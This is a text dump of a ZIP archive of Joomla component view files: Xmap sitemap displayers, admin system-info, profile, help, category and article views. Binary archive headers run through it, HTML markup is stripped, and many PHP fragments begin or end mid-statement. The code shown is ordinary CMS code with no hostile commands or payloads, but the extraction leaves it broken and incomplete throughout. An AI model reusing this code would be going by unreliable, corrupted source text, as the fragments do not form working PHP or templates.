  • \n"; $this->_childs[$this->level]++; echo $out; if ($this->canEdit) { if ( $this->isExcluded($node->id,$node->uid) ) { $img = 'v'; $class= 'xmapexclon'; } else { $img = 'x'; $class= 'xmapexcloff'; } echo ' '.$img.''; } $this->count++; $this->_last_child[$this->level] = $node->uid; return TRUE; } /** * Moves sitemap level up or down */ function changeLevel( $level ) { if ( $level > 0 ) { # We do not print start ul here to avoid empty list, it's printed at the first child $this->level += $level; $this->_childs[$this->level]=0; $this->_openList = "\n\n"; } $this->_closeItem =''; $this->_openList = ''; $this->level += $level; } } function startMenu(&$menu) { if( $this->sitemap->params->get('columns') > 1 ) // use columns echo '
    '; if( $this->sitemap->params->get('show_menutitle') ) // show menu titles echo ''; } function endMenu(&$menu) { $sitemap=&$this->sitemap; $this->_closeItem=''; if( $sitemap->params->get('columns')> 1 ) { echo "
    \n"; } } } PKB\)html/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\6html/tmpl/index.htmlnuW+APKB\@ dhtml/tmpl/default_items.phpnuW+Astate->get('params'); // Use the class defined in default_class.php to print the sitemap $this->displayer->printSitemap();PKB\L4whtml/tmpl/default.xmlnuW+A
    PKB\Sf html/tmpl/default.phpnuW+Aitem->params; if ($this->displayer->canEdit) { $live_site = JURI::root(); JHTML::_('behavior.framework', true); $ajaxurl = "{$live_site}index.php?option=com_xmap&format=json&task=ajax.editElement&action=toggleElement&".JSession::getFormToken().'=1'; $css = '.xmapexcl img{ border:0px; }'."\n"; $css .= '.xmapexcloff { text-decoration:line-through; }'; //$css .= "\n.".$this->item->classname .' li {float:left;}'; $js = " window.addEvent('domready',function (){ $$('.xmapexcl').each(function(el){ el.onclick = function(){ if (this && this.rel) { options = JSON.decode(this.rel); this.onComplete = checkExcludeResult var myAjax = new Request.JSON({ url:'{$ajaxurl}', onSuccess: checkExcludeResult.bind(this) }).get({id:{$this->item->id},uid:options.uid,itemid:options.itemid}); } return false; }; }); }); checkExcludeResult = function (response) { //this.set('class','xmapexcl xmapexcloff'); var imgs = this.getElementsByTagName('img'); if (response.result == 'OK') { var state = response.state; if (state==0) { imgs[0].src='{$live_site}/components/com_xmap/assets/images/unpublished.png'; } else { imgs[0].src='{$live_site}/components/com_xmap/assets/images/tick.png'; } } else { alert('The element couldn\\'t be published or upublished!'); } }"; $doc = JFactory::getDocument(); $doc->addStyleDeclaration ($css); $doc->addScriptDeclaration ($js); } ?>
    get('show_page_heading', 1) && $params->get('page_heading') != '') : ?>

    escape($params->get('page_heading')); ?>

    get('access-edit') || $params->get('show_title') || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?> get('showintro', 1) ) : ?> item->introtext; ?> loadTemplate('items'); ?>  
    PKB\6xml/index.htmlnuW+APKB\)xml/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\ QcLcLxml/tmpl/default_xsl.phpnuW+AcanEdit && JRequest::getBool('filter_showtitle', 0); $showExcluded = $this->canEdit && JRequest::getBool('filter_showexcluded', 0); echo '',"\n"; ?> <?php echo JText::_('COM_XMAP_XML_FILE'); ?> isImages): ?> canEdit): ?> isImages): ?> canEdit): ?>
    canEdit): ?> Images
    -
    PKB\6xml/tmpl/index.htmlnuW+APKB\QGYYxml/tmpl/default_class.phpnuW+Auids = array(); $this->defaultLanguage = strtolower(JFactory::getLanguage()->getTag()); if (preg_match('/^([a-z]+)-.*/',$this->defaultLanguage,$matches) && !in_array($this->defaultLanguage, array(' zh-cn',' zh-tw')) ) { $this->defaultLanguage = $matches[1]; } $this->showTitle = JRequest::getBool('filter_showtitle', 0); $this->showExcluded = JRequest::getBool('filter_showexcluded', 0); $db = JFactory::getDbo(); $this->nullDate = $db->getNullDate(); } /** * Prints an XML node for the sitemap * * @param stdclass $node */ function printNode($node) { $node->isExcluded = false; if ($this->isExcluded($node->id,$node->uid)) { if (!$this->showExcluded || !$this->canEdit) { return false; } $node->isExcluded = true; } if ($this->isNews && (!isset($node->newsItem) || !$node->newsItem)) { return true; } // For images sitemaps only display pages with images if ($this->isImages && (!isset($node->images) || !count($node->images))) { return true; } // Get the item's URL $link = JRoute::_($node->link, true, @$node->secure==0? -1: $node->secure); if (!isset($node->browserNav)) $node->browserNav = 0; if ($node->browserNav != 3 // ignore "no link" && empty($this->_links[$link])) { // ignore links that have been added already $this->count++; $this->_links[$link] = 1; if (!isset($node->priority)) $node->priority = "0.5"; if (!isset($node->changefreq)) $node->changefreq = 'daily'; // Get the chancefrequency and priority for this item $changefreq = $this->getProperty('changefreq', $node->changefreq, $node->id, 'xml', $node->uid); $priority = $this->getProperty('priority', $node->priority, $node->id, 'xml', $node->uid); echo '' . "\n"; echo '', $link, '' . "\n"; if ($this->canEdit) { if ($this->showTitle) { echo '<![CDATA['.$node->name.']]>' . "\n"; } if ($this->showExcluded) { echo '',($node->isExcluded? 'excluded':''),''; } echo '', $node->uid, '' . "\n"; echo '', $node->id, '' . "\n"; } $modified = (isset($node->modified) && $node->modified != FALSE && $node->modified != $this->nullDate && $node->modified != -1) ? $node->modified : NULL; if (!$modified && $this->isNews) { $modified = time(); } if ($modified && !is_numeric($modified)){ $date = new JDate($modified); $modified = $date->toUnix(); } if ($modified) { $modified = gmdate('Y-m-d\TH:i:s\Z', $modified); } // If this is not a news sitemap if (!$this->isNews) { if ($this->isImages) { foreach ($node->images as $image) { echo '', "\n"; echo '', $image->src, '', "\n"; if ($image->title) { $image->title = str_replace('&', '&', html_entity_decode($image->title, ENT_NOQUOTES, 'UTF-8')); echo '', $image->title, '', "\n"; } else { echo ''; } if (isset($image->license) && $image->license) { echo '',str_replace('&', '&',html_entity_decode($image->license, ENT_NOQUOTES, 'UTF-8')),'',"\n"; } echo '', "\n"; } } else { if ($modified){ echo '', $modified, '' . "\n"; } echo '', $changefreq, '' . "\n"; echo '', $priority, '' . "\n"; } } else { if (isset($node->keywords)) { $keywords = htmlspecialchars($node->keywords); } else { $keywords = ''; } if (!isset($node->language) || $node->language == '*') { $node->language = $this->defaultLanguage; } echo "\n"; echo ''."\n"; echo ' '.(htmlspecialchars($this->sitemap->params->get('news_publication_name'))).''."\n"; echo ' '.$node->language.''."\n"; echo ''."\n"; echo '', $modified, '' . "\n"; echo 'name.']]>' . "\n"; if ($keywords) { echo '', $keywords, '' . "\n"; } echo "\n"; } echo '', "\n"; } else { return empty($this->_links[$link]); } return true; } /** * * @param string $property The property that is needed * @param string $value The default value if the property is not found * @param int $Itemid The menu item id * @param string $view (xml / html) * @param int $uid Unique id of the element on the sitemap * (the id asigned by the extension) * @return string */ function getProperty($property, $value, $Itemid, $view, $uid) { if (isset($this->jview->sitemapItems[$view][$Itemid][$uid][$property])) { return $this->jview->sitemapItems[$view][$Itemid][$uid][$property]; } return $value; } /** * Called on every level change * * @param int $level * @return boolean */ function changeLevel($level) { return true; } /** * Function called before displaying the menu * * @param stdclass $menu The menu node item * @return boolean */ function startMenu($menu) { return true; } /** * Function called after displaying the menu * * @param stdclass $menu The menu node item * @return boolean */ function endMenu($menu) { return true; } } PKB\>_xml/tmpl/default_items.phpnuW+Astate->get('params'); // Use the class defined in default_class.php to print the sitemap $this->displayer->printSitemap();PKB\㱊kkxml/tmpl/default.phpnuW+Aitem->params; $live_site = substr_replace(JURI::root(), "", -1, 1); header('Content-type: text/xml; charset=utf-8'); echo '',"\n"; if (($this->item->params->get('beautify_xml', 1) == 1) && !$this->displayer->isNews) { $params = '&filter_showtitle='.JRequest::getBool('filter_showtitle',0); $params .= '&filter_showexcluded='.JRequest::getBool('filter_showexcluded',0); $params .= (JRequest::getCmd('lang')?'&lang='.JRequest::getCmd('lang'):''); echo 'item->id.($this->isImages?'&images=1':'').$params.'"?>'."\n"; } ?> displayer->isImages? ' xmlns:image="http://www.google.com/schemas/sitemap-image/1.1"':''); ?>displayer->isNews? ' xmlns:news="http://www.google.com/schemas/sitemap-news/0.9"':''); ?>> loadTemplate('items'); ?> PKB\kxml/view.html.phpnuW+Auser = JFactory::getUser(); $isNewsSitemap = JRequest::getInt('news',0); $this->isImages = JRequest::getInt('images',0); $model = $this->getModel('Sitemap'); $this->setModel($model); // force to not display errors on XML sitemap @ini_set('display_errors', 0); # Increase memory and max execution time for XML sitemaps to make it work # with very large sites @ini_set('memory_limit','512M'); @ini_set('max_execution_time',300); $layout = $this->getLayout(); $this->item = $this->get('Item'); $this->state = $this->get('State'); $this->canEdit = JFactory::getUser()->authorise('core.admin', 'com_xmap'); // For now, news sitemaps are not editable $this->canEdit = $this->canEdit && !$isNewsSitemap; if ($layout == 'xsl') { return $this->displayXSL($layout); } // Get model data. $this->items = $this->get('Items'); $this->sitemapItems = $this->get('SitemapItems'); $this->extensions = $this->get('Extensions'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseWarning(500, implode("\n", $errors)); return false; } // Add router helpers. $this->item->slug = $this->item->alias ? ($this->item->id . ':' . $this->item->alias) : $this->item->id; $this->item->rlink = JRoute::_('index.php?option=com_xmap&view=xml&id=' . $this->item->slug); // Create a shortcut to the paramemters. $params = &$this->state->params; $offset = $this->state->get('page.offset'); if (!$this->item->params->get('access-view')) { if ($this->user->get('guest')) { // Redirect to login $uri = JFactory::getURI(); $app->redirect( 'index.php?option=com_users&view=login&return=' . base64_encode($uri), JText::_('Xmap_Error_Login_to_view_sitemap') ); return; } else { JError::raiseWarning(403, JText::_('Xmap_Error_Not_auth')); return; } } // Override the layout. if ($layout = $params->get('layout')) { $this->setLayout($layout); } // Load the class used to display the sitemap $this->loadTemplate('class'); $this->displayer = new XmapXmlDisplayer($params, $this->item); $this->displayer->setJView($this); $this->displayer->isNews = $isNewsSitemap; $this->displayer->isImages = $this->isImages; $this->displayer->canEdit = $this->canEdit; $doCompression = ($this->item->params->get('compress_xml') && !ini_get('zlib.output_compression') && ini_get('output_handler') != 'ob_gzhandler'); $this->endAllBuffering(); if ($doCompression) { ob_start(); } parent::display($tpl); $model = $this->getModel(); $model->hit($this->displayer->getCount()); if ($doCompression) { $data = ob_get_contents(); JResponse::setBody($data); @ob_end_clean(); echo JResponse::toString(true); } $this->recreateBuffering(); exit; } function displayXSL() { $this->setLayout('default'); $this->endAllBuffering(); parent::display('xsl'); $this->recreateBuffering(); exit; } private function endAllBuffering() { $this->_obLevel = ob_get_level(); while (ob_get_level()) { @ob_end_clean(); } } private function recreateBuffering() { while($this->_obLevel--) { ob_start(); } } } PKB\E ʵxml/metadata.xmlnuW+A PKB\) xml/.htaccessnuW+A Order allow,deny Deny from all PKAB\Vprofile/index.htmlnuW+A PKAB\)profile/.htaccessnuW+A Order allow,deny Deny from all PKAB\Jnprofile/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->form->setValue('password', null); $this->form->setValue('password2', null); parent::display($tpl); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', 1); JToolBarHelper::title(JText::_('COM_ADMIN_VIEW_PROFILE_TITLE'), 'user-profile'); JToolBarHelper::apply('profile.apply'); JToolBarHelper::save('profile.save'); JToolBarHelper::cancel('profile.cancel', 'JTOOLBAR_CLOSE'); JToolBarHelper::divider(); JToolBarHelper::help('JHELP_ADMIN_USER_PROFILE_EDIT'); } } PKAB\,vvprofile/tmpl/edit.phpnuW+Aform->getFieldsets(); ?>
      form->getFieldset('user_details') as $field) :?>
    • label; ?> input; ?>
    name == 'user_details') : continue; endif; echo JHtml::_('sliders.panel', JText::_($fieldset->label), $fieldset->name); ?>
      form->getFieldset($fieldset->name) as $field): ?> hidden): ?> input; ?>
    • label; ?> input; ?>
    PKAB\)profile/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKAB\Vprofile/tmpl/index.htmlnuW+A PKAB\ 44$sysinfo/tmpl/default_phpsettings.phpnuW+A
     
    php_settings['safe_mode']); ?>
    php_settings['open_basedir']); ?>
    php_settings['display_errors']); ?>
    php_settings['short_open_tag']); ?>
    php_settings['file_uploads']); ?>
    php_settings['magic_quotes_gpc']); ?>
    php_settings['register_globals']); ?>
    php_settings['output_buffering']); ?>
    php_settings['session.save_path']); ?>
    php_settings['session.auto_start']); ?>
    php_settings['xml']); ?>
    php_settings['zlib']); ?>
    php_settings['zip']); ?>
    php_settings['disable_functions']); ?>
    php_settings['mbstring']); ?>
    php_settings['iconv']); ?>
    PKAB\Vsysinfo/tmpl/index.htmlnuW+A PKAB\)sysinfo/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKAB\"sysinfo/tmpl/default_directory.phpnuW+A
    directory as $dir=>$info):?>
     
    PKAB\csysinfo/tmpl/default.phpnuW+A
    loadTemplate('system'); ?>
    loadTemplate('phpsettings'); ?>
    loadTemplate('config'); ?>
    loadTemplate('directory'); ?>
    loadTemplate('phpinfo'); ?>
    PKAB\*f#sysinfo/tmpl/default_navigation.phpnuW+A PKAB\~sysinfo/tmpl/default_config.phpnuW+A
    config as $key=>$value):?>
     
    PKAB\{ҭ sysinfo/tmpl/default_phpinfo.phpnuW+A
    php_info;?>
    PKAB\j'  sysinfo/tmpl/default_system.phpnuW+A
     
    info['php'];?>
    info['dbversion'];?>
    info['dbcollation'];?>
    info['phpversion'];?>
    info['server']); ?>
    info['sapi_name'];?>
    info['version'];?>
    info['platform'];?>
    info['useragent']);?>
    PKAB\)sysinfo/.htaccessnuW+A Order allow,deny Deny from all PKAB\Vsysinfo/index.htmlnuW+A PKAB\dzӻsysinfo/view.html.phpnuW+Aauthorise('core.admin')) { return JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR')); } // Initialise variables. $this->php_settings = $this->get('PhpSettings'); $this->config = $this->get('config'); $this->info = $this->get('info'); $this->php_info = $this->get('PhpInfo'); $this->directory = $this->get('directory'); $this->addToolbar(); $this->_setSubMenu(); parent::display($tpl); } /** * Setup the SubMenu * * @since 1.6 */ protected function _setSubMenu() { $contents = $this->loadTemplate('navigation'); $document = JFactory::getDocument(); $document->setBuffer($contents, 'modules', 'submenu'); } /** * Setup the Toolbar * * @since 1.6 */ protected function addToolbar() { JToolBarHelper::title(JText::_('COM_ADMIN_SYSTEM_INFORMATION'), 'systeminfo.png'); JToolBarHelper::help('JHELP_SITE_SYSTEM_INFORMATION'); } } PKAB\)help/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKAB\ML( ( help/tmpl/default.phpnuW+A
      toc as $k=>$v):?>
    • 'helpFrame'));?>
    PKAB\Vhelp/tmpl/index.htmlnuW+A PKAB\dhelp/view.html.phpnuW+Ahelp_search = $this->get('HelpSearch'); $this->page = $this->get('Page'); $this->toc = $this->get('Toc'); $this->lang_tag = $this->get('LangTag'); $this->latest_version_check = $this->get('LatestVersionCheck'); $this->addToolbar(); parent::display($tpl); } /** * Setup the Toolbar * * @since 1.6 */ protected function addToolbar() { JToolBarHelper::title(JText::_('COM_ADMIN_HELP'), 'help_header.png'); } } PKAB\Vhelp/index.htmlnuW+A PKAB\)help/.htaccessnuW+A Order allow,deny Deny from all PK+B\,category/tmpl/edit.phpnuW+A
    • form->getLabel('title'); ?> form->getInput('title'); ?>
    • form->getLabel('alias'); ?> form->getInput('alias'); ?>
    • form->getLabel('extension'); ?> form->getInput('extension'); ?>
    • form->getLabel('parent_id'); ?> form->getInput('parent_id'); ?>
    • form->getLabel('published'); ?> form->getInput('published'); ?>
    • form->getLabel('access'); ?> form->getInput('access'); ?>
    • canDo->get('core.admin')): ?>
    • form->getLabel('language'); ?> form->getInput('language'); ?>
    • form->getLabel('id'); ?> form->getInput('id'); ?>
    form->getLabel('description'); ?>
    form->getInput('description'); ?>
    item->id, array('useCookie'=>1)); ?> loadTemplate('options'); ?>
    loadTemplate('metadata'); ?>
    form->getFieldsets('attribs'); ?> $fieldSet) : ?> label) ? $fieldSet->label : 'COM_CATEGORIES_'.$name.'_FIELDSET_LABEL'; ?> description) && trim($fieldSet->description)) : ?>

    escape(JText::_($fieldSet->description));?>

      form->getFieldset($name) as $field) : ?>
    • label; ?> input; ?>
    canDo->get('core.admin')): ?>
    item->id, array('useCookie'=>1)); ?>
    form->getLabel('rules'); ?> form->getInput('rules'); ?>
    PK+B\ŕcategory/tmpl/edit_options.phpnuW+A
    form->getFieldsets('params'); foreach ($fieldSets as $name => $fieldSet) : $label = !empty($fieldSet->label) ? $fieldSet->label : 'COM_CATEGORIES_'.$name.'_FIELDSET_LABEL'; echo JHtml::_('sliders.panel', JText::_($label), $name.'-options'); if (isset($fieldSet->description) && trim($fieldSet->description)) : echo '

    '.$this->escape(JText::_($fieldSet->description)).'

    '; endif; ?>
    PK+B\mcategory/tmpl/edit_metadata.phpnuW+A PK+B\Vcategory/tmpl/index.htmlnuW+A PK+B\)category/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK+B\ucategory/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); $this->canDo = CategoriesHelper::getActions($this->state->get('category.component')); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } parent::display($tpl); JRequest::setVar('hidemainmenu', true); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { // Initialise variables. $extension = JRequest::getCmd('extension'); $user = JFactory::getUser(); $userId = $user->get('id'); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $userId); // Avoid nonsense situation. if ($extension == 'com_categories') { return; } // The extension can be in the form com_foo.section $parts = explode('.', $extension); $component = $parts[0]; $section = (count($parts) > 1) ? $parts[1] : null; // Need to load the menu language file as mod_menu hasn't been loaded yet. $lang = JFactory::getLanguage(); $lang->load($component, JPATH_BASE, null, false, true) || $lang->load($component, JPATH_ADMINISTRATOR . '/components/' . $component, null, false, true); // Load the category helper. require_once JPATH_COMPONENT.'/helpers/categories.php'; // Get the results for each action. $canDo = CategoriesHelper::getActions($component, $this->item->id); // If a component categories title string is present, let's use it. if ($lang->hasKey($component_title_key = $component.($section?"_$section":'').'_CATEGORY_'.($isNew?'ADD':'EDIT').'_TITLE')) { $title = JText::_($component_title_key); } // Else if the component section string exits, let's use it elseif ($lang->hasKey($component_section_key = $component.($section?"_$section":''))) { $title = JText::sprintf( 'COM_CATEGORIES_CATEGORY_'.($isNew?'ADD':'EDIT').'_TITLE', $this->escape(JText::_($component_section_key))); } // Else use the base title else { $title = JText::_('COM_CATEGORIES_CATEGORY_BASE_'.($isNew?'ADD':'EDIT').'_TITLE'); } // Load specific css component JHtml::_('stylesheet', $component.'/administrator/categories.css', array(), true); // Prepare the toolbar. JToolBarHelper::title($title, 'category-'.($isNew?'add':'edit').' '.substr($component, 4).($section?"-$section":'').'-category-'.($isNew?'add':'edit')); // For new records, check the create permission. if ($isNew && (count($user->getAuthorisedCategories($component, 'core.create')) > 0)) { JToolBarHelper::apply('category.apply'); JToolBarHelper::save('category.save'); JToolBarHelper::save2new('category.save2new'); } // If not checked out, can save the item. elseif (!$checkedOut && ($canDo->get('core.edit') || ($canDo->get('core.edit.own') && $this->item->created_user_id == $userId))) { JToolBarHelper::apply('category.apply'); JToolBarHelper::save('category.save'); if ($canDo->get('core.create')) { JToolBarHelper::save2new('category.save2new'); } } // If an existing item, can save to a copy. if (!$isNew && $canDo->get('core.create')) { JToolBarHelper::save2copy('category.save2copy'); } if (empty($this->item->id)) { JToolBarHelper::cancel('category.cancel'); } else { JToolBarHelper::cancel('category.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); // Compute the ref_key if it does exist in the component if (!$lang->hasKey($ref_key = strtoupper($component.($section?"_$section":'')).'_CATEGORY_'.($isNew?'ADD':'EDIT').'_HELP_KEY')) { $ref_key = 'JHELP_COMPONENTS_'.strtoupper(substr($component, 4).($section?"_$section":'')).'_CATEGORY_'.($isNew?'ADD':'EDIT'); } // Get help for the category/section view for the component by // -remotely searching in a language defined dedicated URL: *component*_HELP_URL // -locally searching in a component help file if helpURL param exists in the component and is set to '' // -remotely searching in a component URL if helpURL param exists in the component and is NOT set to '' if ($lang->hasKey($lang_help_url = strtoupper($component).'_HELP_URL')) { $debug = $lang->setDebug(false); $url = JText::_($lang_help_url); $lang->setDebug($debug); } else { $url = null; } JToolBarHelper::help($ref_key, JComponentHelper::getParams( $component )->exists('helpURL'), $url, $component); } } PK+B\Vcategory/index.htmlnuW+A PK+B\)category/.htaccessnuW+A Order allow,deny Deny from all PK+B\s~b  !categories/tmpl/default_batch.phpnuW+Astate->get('filter.published'); $extension = $this->escape($this->state->get('filter.extension')); ?>

    = 0) : ?>
    PK+B\Vcategories/tmpl/index.htmlnuW+A PK+B\ categories/tmpl/default.phpnuW+Aget('id'); $extension = $this->escape($this->state->get('filter.extension')); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $ordering = ($listOrder == 'a.lft'); $saveOrder = ($listOrder == 'a.lft' && $listDirn == 'asc'); ?>
    items as $i => $item) : $orderkey = array_search($item->id, $this->ordering[$item->parent_id]); $canEdit = $user->authorise('core.edit', $extension.'.category.'.$item->id); $canCheckin = $user->authorise('core.admin', 'com_checkin') || $item->checked_out == $userId || $item->checked_out == 0; $canEditOwn = $user->authorise('core.edit.own', $extension.'.category.'.$item->id) && $item->created_user_id == $userId; $canChange = $user->authorise('core.edit.state', $extension.'.category.'.$item->id) && $canCheckin; ?>
    items, 'filesave.png', 'categories.saveorder'); ?> state->get('list.direction'), $this->state->get('list.ordering')); ?>
    pagination->getListFooter(); ?>
    id); ?> |—', $item->level-1) ?> checked_out) : ?> editor, $item->checked_out_time, 'categories.', $canCheckin); ?> escape($item->title); ?> escape($item->title); ?>

    |—', $item->level-1) ?> note)) : ?> escape($item->alias));?> escape($item->alias), $this->escape($item->note));?>

    published, $i, 'categories.', $canChange);?> pagination->orderUpIcon($i, isset($this->ordering[$item->parent_id][$orderkey - 1]), 'categories.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $this->pagination->total, isset($this->ordering[$item->parent_id][$orderkey + 1]), 'categories.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> escape($item->access_level); ?> language=='*'):?> language_title ? $this->escape($item->language_title) : JText::_('JUNDEFINED'); ?> id; ?>
    authorize('core.create', $extension) & $user->authorize('core.edit', $extension) && $user->authorize('core.edit.state', $extension)) : ?> loadTemplate('batch'); ?>
    PK+B\)categories/tmpl/.htaccessnuW+A Order allow,deny Deny from all PK+B\)categories/.htaccessnuW+A Order allow,deny Deny from all PK+B\Pc))categories/view.html.phpnuW+Astate = $this->get('State'); $this->items = $this->get('Items'); $this->pagination = $this->get('Pagination'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Preprocess the list of items to find ordering divisions. foreach ($this->items as &$item) { $this->ordering[$item->parent_id][] = $item->id; } // Levels filter. $options = array(); $options[] = JHtml::_('select.option', '1', JText::_('J1')); $options[] = JHtml::_('select.option', '2', JText::_('J2')); $options[] = JHtml::_('select.option', '3', JText::_('J3')); $options[] = JHtml::_('select.option', '4', JText::_('J4')); $options[] = JHtml::_('select.option', '5', JText::_('J5')); $options[] = JHtml::_('select.option', '6', JText::_('J6')); $options[] = JHtml::_('select.option', '7', JText::_('J7')); $options[] = JHtml::_('select.option', '8', JText::_('J8')); $options[] = JHtml::_('select.option', '9', JText::_('J9')); $options[] = JHtml::_('select.option', '10', JText::_('J10')); $this->f_levels = $options; $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { // Initialise variables. $categoryId = $this->state->get('filter.category_id'); $component = $this->state->get('filter.component'); $section = $this->state->get('filter.section'); $canDo = null; $user = JFactory::getUser(); // Avoid nonsense situation. if ($component == 'com_categories') { return; } // Need to load the menu language file as mod_menu hasn't been loaded yet. $lang = JFactory::getLanguage(); $lang->load($component, JPATH_BASE, null, false, true) || $lang->load($component, JPATH_ADMINISTRATOR . '/components/' . $component, null, false, true); // Load the category helper. require_once JPATH_COMPONENT.'/helpers/categories.php'; // Get the results for each action. $canDo = CategoriesHelper::getActions($component, $categoryId); // If a component categories title string is present, let's use it. if ($lang->hasKey($component_title_key = strtoupper($component.($section?"_$section":'')).'_CATEGORIES_TITLE')) { $title = JText::_($component_title_key); } // Else if the component section string exits, let's use it elseif ($lang->hasKey($component_section_key = strtoupper($component.($section?"_$section":'')))) { $title = JText::sprintf( 'COM_CATEGORIES_CATEGORIES_TITLE', $this->escape(JText::_($component_section_key))); } // Else use the base title else { $title = JText::_('COM_CATEGORIES_CATEGORIES_BASE_TITLE'); } // Load specific css component JHtml::_('stylesheet', $component.'/administrator/categories.css', array(), true); // Prepare the toolbar. JToolBarHelper::title($title, 'categories '.substr($component, 4).($section?"-$section":'').'-categories'); if ($canDo->get('core.create') || (count($user->getAuthorisedCategories($component, 'core.create'))) > 0 ) { JToolBarHelper::addNew('category.add'); } if ($canDo->get('core.edit' ) || $canDo->get('core.edit.own')) { JToolBarHelper::editList('category.edit'); JToolBarHelper::divider(); } if ($canDo->get('core.edit.state')) { JToolBarHelper::publish('categories.publish', 'JTOOLBAR_PUBLISH', true); JToolBarHelper::unpublish('categories.unpublish', 'JTOOLBAR_UNPUBLISH', true); JToolBarHelper::divider(); JToolBarHelper::archiveList('categories.archive'); } if (JFactory::getUser()->authorise('core.admin')) { JToolBarHelper::checkin('categories.checkin'); } if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete', $component)) { JToolBarHelper::deleteList('', 'categories.delete', 'JTOOLBAR_EMPTY_TRASH'); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::trash('categories.trash'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::custom('categories.rebuild', 'refresh.png', 'refresh_f2.png', 'JTOOLBAR_REBUILD', false); JToolBarHelper::preferences($component); JToolBarHelper::divider(); } // Compute the ref_key if it does exist in the component if (!$lang->hasKey($ref_key = strtoupper($component.($section?"_$section":'')).'_CATEGORIES_HELP_KEY')) { $ref_key = 'JHELP_COMPONENTS_'.strtoupper(substr($component, 4).($section?"_$section":'')).'_CATEGORIES'; } // Get help for the categories view for the component by // -remotely searching in a language defined dedicated URL: *component*_HELP_URL // -locally searching in a component help file if helpURL param exists in the component and is set to '' // -remotely searching in a component URL if helpURL param exists in the component and is NOT set to '' if ($lang->hasKey($lang_help_url = strtoupper($component).'_HELP_URL')) { $debug = $lang->setDebug(false); $url = JText::_($lang_help_url); $lang->setDebug($debug); } else { $url = null; } JToolBarHelper::help($ref_key, JComponentHelper::getParams( $component )->exists('helpURL'), $url); } } PK+B\Vcategories/index.htmlnuW+A PKEB\p articles/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); $this->authors = $this->get('Authors'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Levels filter. $options = array(); $options[] = JHtml::_('select.option', '1', JText::_('J1')); $options[] = JHtml::_('select.option', '2', JText::_('J2')); $options[] = JHtml::_('select.option', '3', JText::_('J3')); $options[] = JHtml::_('select.option', '4', JText::_('J4')); $options[] = JHtml::_('select.option', '5', JText::_('J5')); $options[] = JHtml::_('select.option', '6', JText::_('J6')); $options[] = JHtml::_('select.option', '7', JText::_('J7')); $options[] = JHtml::_('select.option', '8', JText::_('J8')); $options[] = JHtml::_('select.option', '9', JText::_('J9')); $options[] = JHtml::_('select.option', '10', JText::_('J10')); $this->f_levels = $options; // We don't need toolbar in the modal window. if ($this->getLayout() !== 'modal') { $this->addToolbar(); } parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $canDo = ContentHelper::getActions($this->state->get('filter.category_id')); $user = JFactory::getUser(); JToolBarHelper::title(JText::_('COM_CONTENT_ARTICLES_TITLE'), 'article.png'); if ($canDo->get('core.create') || (count($user->getAuthorisedCategories('com_content', 'core.create'))) > 0 ) { JToolBarHelper::addNew('article.add'); } if (($canDo->get('core.edit')) || ($canDo->get('core.edit.own'))) { JToolBarHelper::editList('article.edit'); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('articles.publish', 'JTOOLBAR_PUBLISH', true); JToolBarHelper::unpublish('articles.unpublish', 'JTOOLBAR_UNPUBLISH', true); JToolBarHelper::custom('articles.featured', 'featured.png', 'featured_f2.png', 'JFEATURED', true); JToolBarHelper::divider(); JToolBarHelper::archiveList('articles.archive'); JToolBarHelper::checkin('articles.checkin'); } if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'articles.delete', 'JTOOLBAR_EMPTY_TRASH'); JToolBarHelper::divider(); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::trash('articles.trash'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_content'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_CONTENT_ARTICLE_MANAGER'); } } PKEB\)articles/.htaccessnuW+A Order allow,deny Deny from all PKEB\2articles/tmpl/modal.phpnuW+AisSite()) { JSession::checkToken('get') or die(JText::_('JINVALID_TOKEN')); } require_once JPATH_ROOT . '/components/com_content/helpers/route.php'; JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html'); JHtml::_('behavior.tooltip'); $function = JRequest::getCmd('function', 'jSelectArticle'); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
